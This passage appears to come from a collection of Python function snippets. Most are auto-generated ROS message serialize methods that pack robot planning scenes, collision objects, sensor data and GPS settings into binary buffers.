unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v16.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v16.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 
or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self) -> bytes:\n pass", "def serialize(self) -> bytes:\n pass", "def serialize(msg) -> str:\n try:\n return json.dumps(msg, separators=(',', ':'))\n except json.JSONDecodeError as err:\n return err.msg", "def serialize(self, buff):\n try:\n buff.write(_get_struct_645f().pack(*self.Rscanpose))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n length = len(self.cnt)\n buff.write(_struct_I.pack(length))\n for val1 in self.cnt:\n _v1 = val1.header\n buff.write(_get_struct_I().pack(_v1.seq))\n _v2 = _v1.stamp\n _x = _v2\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_i().pack(val1.devadd))\n _v3 = val1.now\n _x = _v3\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n buff.write(_get_struct_I().pack(val1.encounter))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def to_bytes(self):\n\t\treturn self.buffer.tobytes();", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_H2BiIbB4H2B3I().pack(_x.mask, _x.dynModel, _x.fixMode, _x.fixedAlt, _x.fixedAltVar, _x.minElev, _x.drLimit, _x.pDop, _x.tDop, _x.pAcc, _x.tAcc, _x.staticHoldThresh, _x.dgpsTimeOut, _x.reserved2, _x.reserved3, _x.reserved4))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene.robot_state.joint_state.header.seq, _x.planning_scene.robot_state.joint_state.header.stamp.secs, _x.planning_scene.robot_state.joint_state.header.stamp.nsecs))\n _x = self.planning_scene.robot_state.joint_state.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = 
len(self.planning_scene.robot_state.joint_state.name)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.joint_state.name:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.robot_state.joint_state.position)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.planning_scene.robot_state.joint_state.position))\n length = len(self.planning_scene.robot_state.joint_state.velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.planning_scene.robot_state.joint_state.velocity))\n length = len(self.planning_scene.robot_state.joint_state.effort)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.planning_scene.robot_state.joint_state.effort))\n _x = self\n buff.write(_struct_2I.pack(_x.planning_scene.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene.robot_state.multi_dof_joint_state.stamp.nsecs))\n length = len(self.planning_scene.robot_state.multi_dof_joint_state.joint_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.joint_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.robot_state.multi_dof_joint_state.frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.robot_state.multi_dof_joint_state.poses)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.poses:\n _v113 = val1.position\n _x = _v113\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v114 = val1.orientation\n _x = _v114\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene.fixed_frame_transforms)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.fixed_frame_transforms:\n _v115 = val1.header\n buff.write(_struct_I.pack(_v115.seq))\n _v116 = _v115.stamp\n _x = _v116\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v115.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.child_frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v117 = val1.transform\n _v118 = _v117.translation\n _x = _v118\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v119 = _v117.rotation\n _x = _v119\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = 
len(self.planning_scene.allowed_collision_matrix.link_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.allowed_collision_matrix.link_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.allowed_collision_matrix.entries)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.allowed_collision_matrix.entries:\n length = len(val1.enabled)\n buff.write(_struct_I.pack(length))\n pattern = '<%sB'%length\n buff.write(struct.pack(pattern, *val1.enabled))\n length = len(self.planning_scene.allowed_contacts)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.allowed_contacts:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v120 = val1.shape\n buff.write(_struct_b.pack(_v120.type))\n length = len(_v120.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *_v120.dimensions))\n length = len(_v120.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(struct.pack(pattern, *_v120.triangles))\n length = len(_v120.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in _v120.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v121 = val1.pose_stamped\n _v122 = _v121.header\n buff.write(_struct_I.pack(_v122.seq))\n _v123 = _v122.stamp\n _x = _v123\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v122.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v124 = _v121.pose\n _v125 = _v124.position\n _x = _v125\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v126 = _v124.orientation\n _x = _v126\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.link_names)\n buff.write(_struct_I.pack(length))\n for val2 in val1.link_names:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n buff.write(_struct_d.pack(val1.penetration_depth))\n length = len(self.planning_scene.link_padding)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.link_padding:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_d.pack(val1.padding))\n length = len(self.planning_scene.collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.collision_objects:\n _v127 = val1.header\n buff.write(_struct_I.pack(_v127.seq))\n _v128 = _v127.stamp\n _x = _v128\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v127.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.padding))\n _v129 = val1.operation\n buff.write(_struct_b.pack(_v129.operation))\n length = len(val1.shapes)\n buff.write(_struct_I.pack(length))\n for val2 in 
val1.shapes:\n buff.write(_struct_b.pack(val2.type))\n length = len(val2.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *val2.dimensions))\n length = len(val2.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(struct.pack(pattern, *val2.triangles))\n length = len(val2.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in val2.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = len(val1.poses)\n buff.write(_struct_I.pack(length))\n for val2 in val1.poses:\n _v130 = val2.position\n _x = _v130\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v131 = val2.orientation\n _x = _v131\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene.attached_collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.attached_collision_objects:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v132 = val1.object\n _v133 = _v132.header\n buff.write(_struct_I.pack(_v133.seq))\n _v134 = _v133.stamp\n _x = _v134\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v133.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v132.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(_v132.padding))\n _v135 = _v132.operation\n buff.write(_struct_b.pack(_v135.operation))\n length = len(_v132.shapes)\n buff.write(_struct_I.pack(length))\n for val3 in _v132.shapes:\n buff.write(_struct_b.pack(val3.type))\n length = len(val3.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *val3.dimensions))\n length = len(val3.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(struct.pack(pattern, *val3.triangles))\n length = len(val3.vertices)\n buff.write(_struct_I.pack(length))\n for val4 in val3.vertices:\n _x = val4\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = len(_v132.poses)\n buff.write(_struct_I.pack(length))\n for val3 in _v132.poses:\n _v136 = val3.position\n _x = _v136\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v137 = val3.orientation\n _x = _v137\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.touch_links)\n buff.write(_struct_I.pack(length))\n for val2 in val1.touch_links:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene.collision_map.header.seq, _x.planning_scene.collision_map.header.stamp.secs, _x.planning_scene.collision_map.header.stamp.nsecs))\n _x = self.planning_scene.collision_map.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.planning_scene.collision_map.boxes)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.collision_map.boxes:\n _v138 = val1.center\n _x = _v138\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v139 = val1.extents\n _x = _v139\n 
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v140 = val1.axis\n _x = _v140\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n buff.write(_struct_f.pack(val1.angle))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_b7d().pack(_x.decision, _x.distance, _x.oriX, _x.oriY, _x.oriZ, _x.placX, _x.placY, _x.placZ))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_BQ().pack(_x.Front_sens.ID, _x.Front_sens.timestamp))\n buff.write(_get_struct_3d().pack(*self.Front_sens.compass))\n buff.write(_get_struct_3d().pack(*self.Front_sens.gyro))\n buff.write(_get_struct_3d().pack(*self.Front_sens.accel))\n buff.write(_get_struct_3d().pack(*self.Front_sens.fusionPose))\n buff.write(_get_struct_4d().pack(*self.Front_sens.fusionQPose))\n _x = self\n buff.write(_get_struct_BQ().pack(_x.Rear_sens.ID, _x.Rear_sens.timestamp))\n buff.write(_get_struct_3d().pack(*self.Rear_sens.compass))\n buff.write(_get_struct_3d().pack(*self.Rear_sens.gyro))\n buff.write(_get_struct_3d().pack(*self.Rear_sens.accel))\n buff.write(_get_struct_3d().pack(*self.Rear_sens.fusionPose))\n buff.write(_get_struct_4d().pack(*self.Rear_sens.fusionQPose))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene_diff.robot_state.joint_state.header.seq, _x.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs))\n _x = self.planning_scene_diff.robot_state.joint_state.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.planning_scene_diff.robot_state.joint_state.name)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.joint_state.name:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.joint_state.position)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.planning_scene_diff.robot_state.joint_state.position))\n length = len(self.planning_scene_diff.robot_state.joint_state.velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.planning_scene_diff.robot_state.joint_state.velocity))\n length = len(self.planning_scene_diff.robot_state.joint_state.effort)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.planning_scene_diff.robot_state.joint_state.effort))\n _x = self\n buff.write(_struct_2I.pack(_x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.secs, 
_x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.nsecs))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.poses)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.poses:\n _v1 = val1.position\n _x = _v1\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v2 = val1.orientation\n _x = _v2\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene_diff.fixed_frame_transforms)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.fixed_frame_transforms:\n _v3 = val1.header\n buff.write(_struct_I.pack(_v3.seq))\n _v4 = _v3.stamp\n _x = _v4\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v3.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.child_frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v5 = val1.transform\n _v6 = _v5.translation\n _x = _v6\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v7 = _v5.rotation\n _x = _v7\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene_diff.allowed_collision_matrix.link_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.allowed_collision_matrix.link_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.allowed_collision_matrix.entries)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.allowed_collision_matrix.entries:\n length = len(val1.enabled)\n buff.write(_struct_I.pack(length))\n pattern = '<%sB'%length\n buff.write(struct.pack(pattern, *val1.enabled))\n length = len(self.planning_scene_diff.allowed_contacts)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.allowed_contacts:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v8 = val1.shape\n buff.write(_struct_b.pack(_v8.type))\n length = len(_v8.dimensions)\n 
buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *_v8.dimensions))\n length = len(_v8.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(struct.pack(pattern, *_v8.triangles))\n length = len(_v8.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in _v8.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v9 = val1.pose_stamped\n _v10 = _v9.header\n buff.write(_struct_I.pack(_v10.seq))\n _v11 = _v10.stamp\n _x = _v11\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v10.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v12 = _v9.pose\n _v13 = _v12.position\n _x = _v13\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v14 = _v12.orientation\n _x = _v14\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.link_names)\n buff.write(_struct_I.pack(length))\n for val2 in val1.link_names:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n buff.write(_struct_d.pack(val1.penetration_depth))\n length = len(self.planning_scene_diff.link_padding)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.link_padding:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_d.pack(val1.padding))\n length = len(self.planning_scene_diff.collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.collision_objects:\n _v15 = val1.header\n buff.write(_struct_I.pack(_v15.seq))\n _v16 = _v15.stamp\n _x = _v16\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v15.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.padding))\n _v17 = val1.operation\n buff.write(_struct_b.pack(_v17.operation))\n length = len(val1.shapes)\n buff.write(_struct_I.pack(length))\n for val2 in val1.shapes:\n buff.write(_struct_b.pack(val2.type))\n length = len(val2.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *val2.dimensions))\n length = len(val2.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(struct.pack(pattern, *val2.triangles))\n length = len(val2.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in val2.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = len(val1.poses)\n buff.write(_struct_I.pack(length))\n for val2 in val1.poses:\n _v18 = val2.position\n _x = _v18\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v19 = val2.orientation\n _x = _v19\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene_diff.attached_collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.attached_collision_objects:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n 
buff.write(struct.pack('<I%ss'%length, length, _x))\n _v20 = val1.object\n _v21 = _v20.header\n buff.write(_struct_I.pack(_v21.seq))\n _v22 = _v21.stamp\n _x = _v22\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v21.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v20.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(_v20.padding))\n _v23 = _v20.operation\n buff.write(_struct_b.pack(_v23.operation))\n length = len(_v20.shapes)\n buff.write(_struct_I.pack(length))\n for val3 in _v20.shapes:\n buff.write(_struct_b.pack(val3.type))\n length = len(val3.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *val3.dimensions))\n length = len(val3.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(struct.pack(pattern, *val3.triangles))\n length = len(val3.vertices)\n buff.write(_struct_I.pack(length))\n for val4 in val3.vertices:\n _x = val4\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = len(_v20.poses)\n buff.write(_struct_I.pack(length))\n for val3 in _v20.poses:\n _v24 = val3.position\n _x = _v24\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v25 = val3.orientation\n _x = _v25\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.touch_links)\n buff.write(_struct_I.pack(length))\n for val2 in val1.touch_links:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene_diff.collision_map.header.seq, _x.planning_scene_diff.collision_map.header.stamp.secs, _x.planning_scene_diff.collision_map.header.stamp.nsecs))\n _x = self.planning_scene_diff.collision_map.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.planning_scene_diff.collision_map.boxes)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.collision_map.boxes:\n _v26 = val1.center\n _x = _v26\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v27 = val1.extents\n _x = _v27\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v28 = val1.axis\n _x = _v28\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n buff.write(_struct_f.pack(val1.angle))\n length = len(self.operations.collision_operations)\n buff.write(_struct_I.pack(length))\n for val1 in self.operations.collision_operations:\n _x = val1.object1\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.object2\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_di.pack(_x.penetration_distance, _x.operation))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.model_aligned.header.seq, _x.model_aligned.header.stamp.secs, _x.model_aligned.header.stamp.nsecs))\n _x = self.model_aligned.header.frame_id\n length 
= len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model_aligned.id))\n _x = self.model_aligned.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model_aligned.params)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.model_aligned.track.header.seq, _x.model_aligned.track.header.stamp.secs, _x.model_aligned.track.header.stamp.nsecs))\n _x = self.model_aligned.track.header.frame_id\n length = 